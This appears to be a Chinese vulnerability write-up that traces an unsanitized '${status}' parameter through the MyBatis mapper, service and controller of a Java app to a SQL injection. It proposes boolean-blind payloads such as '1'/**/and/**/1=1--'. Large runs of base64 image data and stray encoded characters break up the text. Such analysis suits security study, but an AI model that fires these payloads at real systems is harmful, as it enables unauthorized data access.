pecuS2JfVDzvG3/Ia3roAQNcJ86gixyehNVKM8y3YAq+D3X3tX4S60nPYZx2eXmBO8s7tM19f2+sFqCv9vq3NLzQCJy3XPlxfZtu3t8ZcFgXmoe7WJNWchM/fx+G2Lei8YF/3IeDk/D2u+wfrgw2nYdptr+Nq6R5z4tz1M+wpvWoZZj2C4X2dfs9hdqyvBa8dOrGwYe979qEMdfiHE/OZ9YW3XkOLl0P8kf3d32C4vgy2z5iXZD9YbURERLTW+TNH27kDwld56/xph04IyzHeOibsR3263+/5wbvbGCyjR23nlWgKYPeli8DOHciMy8czOwdx8dKQ38fG5e+29YILQhx27FQBg0MYAoCMHdgZPwidXbY9pNNhECpkZfhx/BJJSkrC1q1bF11mubmbj72Qed1LwZpwq1Qqj2XCw8NRVFSEv/iLv0BKSsri61z0GbwoeP17tld37dlX5riz66Yl0SjA69/bA8AytPavncpJVZ/ULpyz9VjXlcYiJiYGsbHbYe1Yv9qps/QmA7Zex6CudJ6NLV4fVDjut/+Fv/21FrS8tt3vYe5l9eZXsglCNopKzAmz5RYiq6gEBXa9tXu/azekKnuLwz5n5gcwBXi9bf6Vb0L2d/Fdu4cTBa+ftA2P3vO911HQchNdgMswbWQVoaSgBWcbrZW14Kal6YW93/V7iLXH+gIkCHvx5nA9HrVr53P76mH/KV3MPfFLkNqIiIiIvBPPVyF2+1mUtNl10GB+NKRHdaU4hJO2h+QFlhGB22/+teU89ShzGsmpO/GWraPA1jHiNOrS+uB9ZGQE+zrdx9D1s2dQWmfuVArGekaZuw/hYH4cACAu/6Dt3/7SN80PA//5hfm/zgQhDllZ8RjU6WxDxnW6QcTv3IFMu4TQ0/FLKS0tDVlZWW73xcfHY9u2bStuUTF3Hn30UcTGzg+hjo2NXdCK5UthZGQEfX19bvdlZ2ejqqoKX/nKVxASIk2avIgF0h6iOaFBui5rgmWfULW8tl2ahNsl6evCzZYCbMn2b//8auvmHuYCu1+6Afe8P5rjdo6S85PV2O0+enKd5h67r8r9Tl3nVdg/1LB/8CFkfxcX6stsD0UCaX9P9S2EIOxFjd08rzezO3HVZa61RPfEjWC1ERER0dow/39oIGsDiWIXTvxDHcrqL9j+xrStp9NyFo3eppMVvI6T1vVesr8Lc59UGerftHZU7cW+MgBXO20Jc/Z3axzr+euy+b8LLaMu7f++cegYscZ8vgrbX2tBwetttr9BVsrcdFHUo+nkSZzXqrDnO98xDwXf4/gwQJGVhfjBi7jUDWBIB91gPLKyFH4fv5RycnJcelCjo6Oxfft2yRI+MpudncW//Mu/wGQyud2/c+dOKBQKSetcvjuYvcWyiNR8
<p>关注红框这个找到MsgMapperEx.xml文件SQL查询如下</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"getMsgCountByStatus"</span> <span class=na>resultType=</span><span class=s>"java.lang.Long"</span><span class=nt>&gt;</span>
SELECT
COUNT(id)
FROM jsh_msg
WHERE 1=1
and ifnull(delete_Flag,'0') !='1'
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"status != null"</span><span class=nt>&gt;</span>
and status = '${status}'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>这里的status参数直接经过拼接因此可能存在SQL注入找对应的MapperMsgMapperEx.java的文件中</p>
<div class=highlight><pre><span></span><span class=n>Long</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"status"</span><span class=o>)</span> <span class=n>String</span> <span class=n>status</span><span class=o>,</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"userId"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>userId</span><span class=o>);</span>
</pre></div>
<p>Ctrl+B找被调用处应该到Service层即MsgService.java文件中</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>Long</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span><span class=n>String</span> <span class=n>status</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Long</span> <span class=n>result</span><span class=o>=</span><span class=kc>null</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=n>User</span> <span class=n>userInfo</span><span class=o>=</span><span class=n>userService</span><span class=o>.</span><span class=na>getCurrentUser</span><span class=o>();</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>msgMapperEx</span><span class=o>.</span><span class=na>getMsgCountByStatus</span><span class=o>(</span><span class=n>status</span><span class=o>,</span> <span class=n>userInfo</span><span class=o>.</span><span class=na>getId</span><span class=o>());</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>error</span><span class=o>(</span><span class=s>"异常码[{}],异常提示[{}],异常[{}]"</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_CODE</span><span class=o>,</span> <span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_MSG</span><span class=o>,</span><span class=n>e</span><span class=o>);</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>BusinessRunTimeException</span><span class=o>(</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_CODE</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_MSG</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续往上到Controller层来到MsgController.java</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=s>"/getMsgCountByStatus"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>BaseResponseInfo</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"status"</span><span class=o>)</span> <span class=n>String</span> <span class=n>status</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>BaseResponseInfo</span> <span class=n>res</span> <span class=o>=</span> <span class=k>new</span> <span class=n>BaseResponseInfo</span><span class=o>();</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Long</span><span class=o>&gt;</span> <span class=n>map</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Long</span><span class=o>&gt;();</span>
<span class=c1>// 这里</span>
<span class=n>Long</span> <span class=n>count</span> <span class=o>=</span> <span class=n>msgService</span><span class=o>.</span><span class=na>getMsgCountByStatus</span><span class=o>(</span><span class=n>status</span><span class=o>);</span>
<span class=n>map</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"count"</span><span class=o>,</span> <span class=n>count</span><span class=o>);</span>
<span class=n>res</span><span class=o>.</span><span class=na>code</span> <span class=o>=</span> <span class=mi>200</span><span class=o>;</span>
<span class=n>res</span><span class=o>.</span><span class=na>data</span> <span class=o>=</span> <span class=n>map</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>e</span><span class=o>.</span><span class=na>printStackTrace</span><span class=o>();</span>
<span class=n>res</span><span class=o>.</span><span class=na>code</span> <span class=o>=</span> <span class=mi>500</span><span class=o>;</span>
<span class=n>res</span><span class=o>.</span><span class=na>data</span> <span class=o>=</span> <span class=s>"获取数据失败"</span><span class=o>;</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>res</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>首先传入的status在本方法中没有进行任何过滤同时根据前面分析filter中也没有进行过滤另外这里存在3种返回状态</p>
<ul>
<li>查询语句报错返回500即获取数据失败</li>
<li>根据SQL语句分析查询得到的count为0即拼接的条件为false</li>
<li>查询结果count不为0即where的条件为true默认没有拼接条件</li>
</ul>
<p>根据分析,这里可以利用布尔盲注,前提需要在消息列表至少插入一条数据,当然时间注入也可以</p>
<p>正向数据链:/msg/getMsgCountByStatus——&gt;MsgController.getMsgCountByStatus——&gt;MsgService.getMsgCountByStatus——&gt;MsgMapperEx.getMsgCountByStatus——&gt;MsgMapperEx.xml中id为getMsgCountByStatus</p>
<h4>测试</h4>
<p>触发界面:</p>
<p><a id=img10 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233149-045bf992-c117-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB10AAAIoCAYAAAAiOvIbAAEAAElEQVR4nOzdeXxTZfr+8U/SDQoN+1ZWKVIoyo7UFUQpOiwOouyKIirMzBcEBRyXMsLojKAg/sYRFHFQFsGFEWGUsoiiArKDFIoUAaFA2dtS6Jb8/jhJmqRJm260wPV+vVBycpYnyUlazpX7fkytojrYEBG5xmRlZZKefrGshyEiIiIiIiIiIlIooaGVCAoKLuthiIhIIZnLegAiIqUhMzOjrIcgIiIiIiIiIiJSaLquJSJydQos6wGIiJSG7Ozssh6CiIiIiIiIiIhIoem6lohcjVo0qszzA26kRaOwQm+770gq/1z8K/uOpJXCyK4cha4iIiIiIiIiIiIiIiIiUmQTH2pC8+op5JxPdll6lAH9trHSZUmPMX1YfJf7ts2rV2DiQ014fPovV2KopUbthUVERERERERERERERESkyCJrXcKWfdl94aEUEjzWWzlzNZMOuS+zZV8mstal0hzeFaHQVURERERERERERERERESKLE/gCtAkih2f9+G8/c/sDgDp7Dvi5/ZlLLRT00Ktr/bCIiIiIiIiIiIiIiIiIlKKUog/ChBKi0ZlPRbfzGEVqfWne6n+6J3OZWc/Ws+pf6/Gmpp/Na5CVxEREREREREREREREREpcb98vJo7/pvuvN1jzL280qTsxlOQWn/uTvVH7nBbVv3RO8Fk4uQ/l+W7rdoLi4j4YLFYGPPMaHbu2sbOXdsY88xoLBZLWQ9LREREREREROS69HD/fkyfPtXn/dNnTOPh/v2u4IhyRUd3pnPnzmVybJErqX79cFb870tatGhe1kORMmQymQAIDKlIizti6DVmst/brpy5icWlNbBiModVzBO4Ovha7kqVruK3sLAwRo4cQWSLSNau/Y6FCxaV9ZBESoXFYuHx4Y8xfPhjWCwW4uP3AvDMM6MZPvwx3prxNh9++J9SHUOrVlE89tgwGjRs4HOdo78fZebb/4+jvx8t1bGIiIiIiIiIyPUjdtJLtGzZ0ut9e/fuZfIrfy/UeiXl1ls7uwWu48ZNcLt/+oxpPPzwgzz88IMc/f0oGzZsKtHj5yd20ks8/vhjAHz44X9K/LGLlCf16tWjfv1wKlcOK+uheNWiRXOeGz/OefurZSv48suvynBEhRcWFkanTh1Yu3ZdWQ/FO5MJm81Gs0530vmPj1K3WUvABvtne139pkfu5fwjxt+NqteTPP3aUQa84Pvad1mp0KJevveHdmpK+uaDPu9X6FoGwsLCuPvuLkRG3khki0gAEvYlkJDwK99++x2pqanOdVu0aE54eHiZv7nCwsJ4f84sWrRoTkLCfiZMGEdk5I1MivX/2wsiV4OHHu7HmNH/R4OGDdi0aRNvzXibjRuNX9KjozvzzNjRxE56ieHDH2PmzLf57LMvSnwMDRo2YOGi+ZhMJuLj472uExUVRXR0Z2J6dGfwoKHs2eN9PRERERERERGRwoiKMoLUjR6hZfStnZ33FWa9krJhwyY+/fQLI1jt3y/PF9VvvdWoMv300y+uaODaoGEDHn/8MVbFrQbg8ccfY+7c/+hL8iJlpHLlMDp27OC8vWXL1jIcTeHVrx/Om9OnsW7dujLPhbwzgc3GbQ8N59aHHwcg49LFMh5Tybm873i+9+cXuIKX0DUsLIxXJsfy5hszOHYsqXijKwOVKoXSunVrtmzZSlZWVlkPJ4+Ro55kyJBBhIUZ3wJJSNgPwJChgwFITU1lwfxPmDXrPVq0aM77c2axP+HXMn1zuQauk2In8+WXXzF5yiQeeKA3gIJXuSbE9OjOyy+9SIOGDTh69BhPPz2KuJWr3NbZuHETAwcMMYLZMaOZ9sZU+j3Uj5lv5QazJeGhfg9isVjo1bOPzzD1k8UL6Ny5MxaLhYWL5it4lXKn7cAJxDQ+TNzri9lR2gcL787IR9pxLm4qi7eX9sHK8RiuYm0HTiCm2nbmv7uKwv/22ZYBE2Ootn0+s+KMrcNjRjK03bkrc/6VksI+J2XxmEvimFd63MU710rGtXB+ioiIyLVv44ZNzJ37H2cl6969Rhewe+7p5myhGxYWxqq41V7Xi761dNrs/m3SFHr0uBeLxeIMWV2lpKTwt0lTSuXYvgwf/hgAk6cY1a3dY+5l+PDHVO0qcoW1aNGcSpUr0zzSve1xvXr16NCxfb7b7k/41a0Yrqw4MqGwsDDWrVtX1sPJw2Q2Y7NauX3ACO4Y8BTpqeex2ayYTGaw2bxu88vHq7ljQzg//DsKXOZ2bdLwyk/j17FjB2zkHafr629NvcTZj3/w2kr47Mc/FHgMt9DVNVxbuOCTqzJ0DQ0NJbx+Pe6qdCfff7e+3ASvYWFhzHhrGh07dmDrlm0sWLAoT5DarVtXhgwZxMhRT9KxU3siI5s7w9my4i1wBYh9+RUABa9yTXC0gDl69Bjjx0/ks08/z3f9zz79nM8+/Zzhwx/nmbGjWfTJAqZMfpW5cz8s0XH5G6KWXvD6PMsOjYD3mtHnNS93v/BffnvqJrdFu93WNba/OZ8jnFo5gVuezqda2OMYBa7vMXbnsU/F8VynP5H/K5t3e5+P3QsjZMy9fdhX+NZuABNcVkxxCYpcGRflLQWu5wicGueuWGCY4BaI2sfje/9SEtoOnED0Wftz3G4AE6LP5vs6Ga8/bP94FquuyZfFft4ejmPqJzsKsV043UcNpZ2luIF+UY9fOoz3ZMo1/HoXgv0LDJZy8tqIiIiIXM+iolqy6JMFAAwaOASAxk0a8cniBc51VsWt9rpeabBYLGzY+B0Wi/Fv5fj4vaz8xvjCfI/7uhMV1dK5zq3RXUhJSSm1sbh66KF+bNq0yVnZumnTJrrfe69CV5ErbPz4Z72Gqw880NuZY/gy4omRZV4R6xq4llc2q5XI27tz60PDuZhyDgCTyYzNZqNi5XxC1JMHuKPfAefNJn/syo5Hrmzo+sADvXllcqzX+xYuWMTUqdOdt0+9Y/xscQ1ez378g3N5fpyhq2e4VtYnWFGdOnWarVu20aFje+7qUn6C17feeoMOHdszbdoMFsxf6HWdtWuNcvEJE8YxeMigKzzCvHwFrg4KXuVa8fjjjxEfv5eef8j/h6+nuXM/5LPPPmfF/75izDP/V+Kha2E4gtc77+haAv+oeJBZm6fSo5Zxa7e3Vfr9m5+fqsPKZ5sx0pFkvvBffnvqAD83dgSj/6RPk396PcILXx3gyZt/4b/5BKj9Zm/gjR7kHqPfv/n5zan89lVzbujtfb/Osb0ZAysncMPTXzgfzxuH/ktkkz+Sf4bqx2PPw0sIFN6dkY9MYGQt9yAzN0ibagQr4d0Z+chQJlR3DxdyAxj7erRlwMS86znCCbbPZ2pcknMsQydWzyeQaktkY+BwwnVaYWWEbVzRitRwalWDcwn2KkzjRj7BeDitIiyQsp0912oA1y4S4zTccY0c33jvRSTqywtlJTxmJEMjEku0grU09ikiIiIihTNu3BhnVVKPHt2xWCykpqYydux4Z+AKMH36THrc150ZM6ZhsVhY8ukCVrp0MJsx/e1SGd9DD/cjLCzMbfqpzz77gmnTXiemR/c8XdRERLx54IHePDd+rFvgOnLkU4wc+RSpqakkJOwnYV8CW7Zs49tvvyuzcYZUCqNTn8FYrdmYsGHDBCYTIRUqsveHVfyhipXgQLPbNq7zuRYkM9taCqM2rF27zmehqaMjrYM19RIn/7mMk/9cVuAcrp4CoeBw7Wpz6NBhgHITvI4c9WSBgatDixbN6d2n1xUamW/+nhMKXuVasWlT0doDp6Sk8PlnnzPmmdElPKICjnshb7sLi8XCQw/1K174+8J/+c0ept4QmbeSNddqXm/iUTn62h95/9YDPNnjUV7gC9/hZr9/88ebYfd7+QWgzzOsRy1OrZyQG+p+/idej9nAGz0eYFa/f+Yu93wI
<p>抓包:</p>
<p><a id=img11 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233201-0b81979a-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABYAAAAGOCAYAAAAuFKdNAAEAAElEQVR4nOzdd1gURx8H8C+KvaLR2KXZwN6x926isWNLTF5riiZRY5Rix66J0RhTJDaIKSZRLNiixm7snSqoCNJ7nfcPvIWDu9u9QhG/n+e5B3ZnZ/a3s3u3O3N7s2ZCCAEiIiIiIiKiPJKUmIh/T51C5x49ULpMmYIOh4iI6LVSrKADICIiIiIiIiIiIqK8wQ5gIiIiIiIiIiIioiKKHcBERERERERERERERRQ7gImIiIiIiIiIiIiKKHYAExERERERERERERVR7AAmIiIiIiIiIiIiKqLYAUxERERERERERERURLEDmIiIiIiIiIiIiKiIYgcwERERERERERERURHFDmAiIiIiIiIiIiKiIoodwERERERERERERERFFDuAiYiIiIiIiIiIiIoodgATERERERERERERFVHsACYiIiIiIiIiIiIqotgBTERERERERERERFREsQOYiIiIiIiIiIiIqIhiBzARERERERERERFREcUOYCIiIiIiIiIiIqIiih3AREREREREREREREUUO4CJiIiIiIiIiIiIiih2ABMREREREREREREVUewAJiIiIiIiIiIiIiqi2AFMREREREREREREVEQVMzMzg6ZXpw2PCjo203q0AZ2K4nYRERERERG9Jh5t6KSx/Vok27BEREQmovUO4POfNoTZtEP5GUseOoRpDT/F+YIOg4iIiIiIiPJE0WrDEhERmc7LDuCp8BICQggI4YWpqtTv9oOnTyIiIiIiIipc2IYlIiJSSsMdwAMxbGruuQCkYRSkn9l02oBcP7I5NC3Hz3AOYUOnnMsfwjQNP9PJ+jnPNPWTtoL1HpqW8ydAnbDhkarMQfju5XLnP23InwcREREREREVGca1YbW1JYFHOdqyWe1YMzMzLXcb51hGU/s2e7nTDuVoQ+dcVld8yreRiIheb7k7gB9twFJVb+nUYRgoze4Es5zDKJz/FA2znaAebegEs0HfQX2RQfjUiLEXlKz30DQz5FgtERERERERvQ6MaMMqb0vuw+RsNxYBAL4bpN4JfGia2s1H2RbEIDMzaOwv/m5Qjjb0dxiUrQNXLj4l20hERPSyAzjzhGRmZpZ18nBYj4fbVKfOQ1j7shd3qpfqZzYPsd4hM+/SDY/UllH7OY6Xtq9ilVC23v0vT4gO6x++XEZAiHOY0wBoMOec2k+CVMucm9PAiLiIiIiIiIio4JimDaurLanm/HlAWkZVDoDvlr68G/cQpkk9tZqHp/hukKZOWQesf5ijzPP34fNyG3THp2QbiYiItD0EzmE9Hp6bA+mcd2i/9C3md4NUPy1pKN3Ze/6+j9oyU722Sd+6YuDnWScyfSlZbzaq4R34kxciIiIiIqLXiCFt2Gxk25IO6+Eu9Qo3wBwnVbfuedz3UV+fw/rPs9rDGIjPs3qLsT9nD/BUp5eduQ0wZJRquVu4nyMIjfHpuY1ERPT6Un8I3MP1cAAyfzKS7fcpj+7fKpDglK13ILblvMv4/KdomHNcJCIiIiIiIioiTNGGzZu2ZLPG6rcPN2jcTFG+3Mvpjq+g2ulERPTqUb8DuMEcuKu+nfxukDRGUdaJSPXzlByvbQORFxSvd+A2CCHwUO1W4/P4dC1HPSIiIiIiIiqyjG3DGtiW1KfzNWtZBzS2VZxNNr6CaqcTEdGrJ9cQEA3mOOUeo8i2cea3qrlOhI+wYdrLn6BIy6iPbfRow2SdD4E7v+/Ay5+wZB9D+CUl61WL/Zz62Ema1sefwRARERERERUZBrdh1cqQaUue/xRZxag//2bYQAADh2kZ6zfbsg6jMMTAR9FojE/PbSQioteXhjGAs//M5OXA8Q3mwCnrbPZybKGX4wupvszMvky2Afkbauz9HYhh0pBJn6KhmRnMzAbhlkOOs62S9eIQpknzs4955ID1n6u+8bRFYwf1cjpxfAgiIiIiIqIiwMA2rKK2ZJascXYHaRjvVz0G6QF12Zad6pRtjGJFZOJTtI1ERETaHgKX7cFt5z9tiGmHgIHbcv7sJFP2k1juZRyw/qHmb1EHblOf77D+IdxHaVpOfr25TYWX2pNbG2CO+3rouDGYiIiIiIiIXlUGtmFzy9mWfMlhPR7mGI93qpfAuewLDtwGIbyQY9TezLxCwDQjMqjHZ9g2EhHR68ZMCCHydhWPsKHTy28qcz6ZlYiIiIiIiIq8pMRE/HvqFDr36IHSZcoUdDgKsS1LRERFg+Y7gImIiIiIiIiIiIjolccOYCIiIiIiIiIiIqIiih3AREREREREREREREVUPowBTERERERERK+zV3MMYCIioqKBdwATERERERERERERFVHsACYiIiIiIiIiIiIqotgBTERERERERERERFREsQOYiIiIiIiIiIiIqIhiBzARERERERERERFREcUOYCIiIiIiIiIiIqIiih3AREREREREREREREWUeUEHQEREREREZGqN/vejUfkfbJ9iokiIiIiIChbvACYiIiIioiKj0f9+NLrzV1UOERERUVHADmAiIiIiIioSTN1py05gIiIiKgrYAUxERERERERERERURLEDmIiIiIiIiIiIiKiI4kPgiIiIiIioSKpYthTW/a87SpcoLrtseobA0r0X4PssKk9imThxIsaNG4dBgwblSflKRUVFISoqSna5GjVqoHTp0nkfEBEREeU5dgATEREREVGRlJqejqCwWJQpJd/sSUlNR3RCcp7F8vz5c3h4eEgdwBkZGZgwYQI6deqEY8eOwczMDCNHjsT48ePzLAYhBKysrBR1AL/11lv4888/8ywWIiIiyj/sACYiIiIioiIpMTkNS/acL+gwAABdunTBTz/9JE3Hx8dj79698PDwwKhRo1C+fHm899578PPzg5OTU57EYGZmhn///RehoaGyyzZs2DBPYiAiIqL8p7UD2O/otzjiayZNC1EF7ceNQluLfInrFeOLLf0csPhGtvpq4YLzR2fCpgCjyl9B2DvtXfzTYwe+HVdXPWXvNLwXOBnHvuhUQLERERERERWsrl27wsXFBcHBwahTp440/7PPPsOaNWsAAK1bt8bnn3+OefPmoVSpUnkSh52dHezs7PKk7ILmPbs6JuzN3oZtAdfzRzHz9WmU6SGz/fZj9ja/zfv4ads41NWRq2h53duwkbji4YnLkdmOAYu2GDe2DfK828fvGLYcBgbM7APrvF4XEQGQuQPYot1ojH3Z4xt5ZR/27j2GKka+QSOv7MNeH2u1DxVN815F43Y9x8a+gKpD2GF2A4RmziAiIiIionxWvJgZxnRrjCoVdI9l+zwqHqdvBeN5VEKexdKhQweULFkSZ86cwbhx46T5Xbp0Ufs/KSkJvr6+RbaTNq+1cDmHoy97fH239IODw2w0CN0IY1plvlv6wWH/MLUbfDTNexX1WXIM8zsBqs7Q99zqF/FOT8rJpv809LMGVB3Ce49Wwcx+VgUdFhGZmOIhICzatoXtpSPw8esDa35FI8MGM+c6wnXNI/ii7yt9QUBERERE9KqqWrEM5o1qhzIl5Zs9cYmpmPHNMVx68CxPYilbtixat26Ns2fPqnUAFy+e9YC6YsWKAQDS09PzJAYhBGrUqKFoCIiRI0di3759eRJHfrGZOReOruNx0Hsj+vK+HBl1MW5yX/zgHoggdHqN7gKmLBZo294Wly5FIBJWr/TNeUSUmxFjAGd+OxTRvj9w+Ah8YPvy9n1/HN1yBL5mmT8jyPo2KWtYCTNEwGPrFQibfhiAI2rzMqwd0CHyHC5V6a/2rVORuEvYdwv6Objixsu6ybpjOPPnSuOxW7pjOOc3yr5b+sHh4dwidEfxOazq7YRjL+si65vnlz+3+d4KS45/gcxZmd9G/2C1lN9GExEREZFioVEJaDnrZ9nlypcpgUVjO2LpxE7ov+i3PIunS5c
<p>后台查询语句:</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span>
</pre></div>
<p>拼接payload<code>1'/**/and/**/1=1--</code><code>1'/**/and/**/1=2--</code></p>
<p><a id=img12 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233214-1322dffe-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABgYAAAHcCAYAAAAdqxH2AAEAAElEQVR4nOzdd1gURx8H8C/2rmjsDQQbKPaCPRbsxl6wJSaxpmgSNUaaHbsmRmOMbyRqBE0xiWLBFjV2E3unCSiCVOkC8/6Bt3Bwd7vH3QHK9/M8PLo7O7O/nd2729nZnTV7+fKlABERERERERERERERFQpF8jsAIiIiIiIiIiIiIiLKO+wYICIiIiIiIiIiIiIqRNgxQERERERERERERERUiLBjgIiIiIiIiIiIiIioECn2t49PfsdARERERERERERERER5xEwIIfI7CCIiIiIiIiIASEpMxD+nTqFzjx4oVbp0fodDRERE9EbiUEJERERERERERERERIUIOwaIiIiIiIiIiIiIiAoRdgwQERERERERERERERUi7BggIiIiIiIiIiIiIipE2DFARERERERERERERFSIsGOAiIiIiIiIiIiIiKgQYccAEREREREREREREVEhwo4BIiIiIiIiIiIiIqJChB0DRERERERERERERESFCDsGiIiIiIiIiIiIiIgKEXYMEBEREREREREREREVIuwYICIiIiIiIiIiIiIqRNgxQERERERERERERERUiLBjgIiIiIiIiIiIiIioEGHHABERERERERERERFRIcKOASIiIiIiIiIiIiKiQoQdA0REREREREREREREhQg7BoiIiIiIiIiIiIiIChF2DBARERERERERERERFSLsGCAiIiIiIiIiIiIiKkTYMUBEREREREREREREVIiwY4CIiIiIiIiIiIiIqBBhxwARERERERERERERUSHCjgEiIiIiIiIiIiIiokKEHQNERERERERERERERIWI4o6Bh+s7wczMTONfp/UPTRlj3nu4Hp3exO0iIiIiIiIqJApVG5aIiIhIT0Z5YuD8Z41gNu2QMYoqAA5hWqPPcD6/wyAiIiIiIiKTeLPasERERET6y0XHwFR4CwEhBITwxlTV7O/3g6dVREREREREVLCwDUtERESUnYFPDPTH0Klakl4NxyM9rtlpPXI8rHloWrbHOQ9hfafsyx/CNA2Pe2Y+FjpN/WROwXoPTcv+KGknrH+oKnMAvn+13PnPGvExUyIiIiIiojeGYW1YbW1J4GG2tmxmO9bMzEzL0wnZltHUvs1a7rRD2drQ2ZfVFZ/ybSQiIqLCwbCOgYfrsUR1FX3qUPSXZneCWfbheM5/hkZZTlweru8EswHfQ32RAfjMgDF8lKz30DQzZFstERERERERFQYGtGGVtyX3YXKWG84AAN8PUO8cODRN7aa0LAtigJkZNPYjfD8gWxv6ewzIcmFfLj4l20hERESFRy46BjJOVMzMzDJPKuzX4cFW1SnVIax5dXV/qrfqcc0HWGefkXfJ+odqy6g91umt7dYNJZStd/+rEyX7dQ9eLSMgxDnMaQg0nHNO7dFS1TLn5jQ0IC4iIiIiIiLKP8Zpw+pqS6o5fx6QllGVA+D7Ja/u3j+EadIVfM3DHH0/QNPFenuse5CtzPP38OjVNuiOT8k2EhERUWFi+MuH7dfhwbk5kM6FDu2X7nr4foDqEcVG0pMA5+89UltmqvdW6S4N9P8i8wRHX0rWm4VqmCA+OklERERERFSI5KYNm4VsW9J+HTyk3oKGmOOsutx/Hvceqa/Pft0Xme1h9McXmb0I2J+9Z2Cq86uL/A0xaJRquZu4ly0IjfHpuY1ERET05sv9y4cfrIM9kPHoYZbnHB/eu2m04PShbL39sTX7UwnnP0Oj7OMuEhERERER0RvCGG1Y07QlmzdRf9ygYZPmivLlXE53fPnVTiciIqKCK/dPDDScAw/V3QzfD5DGQMw8QVE95pjtb2t/jcUZSvF6+2+FEAIP1B5NOI/P1nBURSIiIiIiojeWoW3YXLYl9bkon7msPZpYK84mG19+tdOJiIio4DJoKKGGc5xzjoFo3STjLowcJ0gPsX7aq0cZpWXUx058uH6yzpcPn9934NWjkFnfUfCKkvWqxX5OfWxGTevj45RERERERERvjFy3YdXKkGlLnv8MmcWov19vaH8A/YdqeZdAlmXtR2FQLl91pzE+PbeRiIiI3nwGvmMg6+OKr15Y1HAOnDPPcl6NXfhq/ELVzQ9Zl8nyIqhGGnsF+mOoNCTjZ2hkZgYzswG4aZ/tLEzJenEI06T5WcdUtMe6L1R3SFijib16OZ04zhAREREREdEbIJdtWEVtyUyZ4/gP0PA+AfUYpBcjZ1l2qnOWdyAoIhOfom0kIiKiwsTwlw9neWHw+c8aYdohoP/W7I8vZsh6cpNzGXuse6D5rov+W9Xn2697AI9RmpaTX29OU+EtzkF6NxQaYo7HOuh4kICIiIiIiIheV7lsw+aUvS35iv06PMg23v9Ub4FzWRfsvxVCeCPbWwEy8goB44zsox5f7raRiIiI3lRmQgiR30Fkeoj1nV7d2WC/Dg/O8QSFiIiIiIioMElKTMQ/p06hc48eKFW6dH6HoxDbskRERPR6MfyJASIiIiIiIiIiIiIiem2wY4CIiIiIiIiIiIiIqBBhxwARERERERERERERUSFSwN4xQERERERERIXZ6/mOASIiIqLXC58YICIiIiIiIiIiIiIqRNgxQERERERERERERERUiLBjgIiIiIiIiIiIiIioEGHHABERERERERERERFRIcKOASIiIiIiIiIiIiKiQoQdA0REREREREREREREhQg7BoiIiIiIiIiIiIiICpFi+R0AERERERFRfmr84f8Myn9/2xQjRUJERERElDf4xAARERERERVKjT/8n8GdAqpyiIiIiIheJ+wYICIiIiKiQsfYF/PZOUBERERErxN2DBARERERERERERERFSLsGCAiIiIiIiIiIiIiKkT48mEiIiIiIir0KpQpibUfdkep4kVll01LF1iy5wJ8n0abJJaJEydi3LhxGDBggEnKVyo6OhrR0dGyy9WoUQOlSpUyfUBEREREZDTsGCAiIiIiokLvZVoagsJfoHRJ+SZSyss0xCQkmyyWZ8+ewdPTU+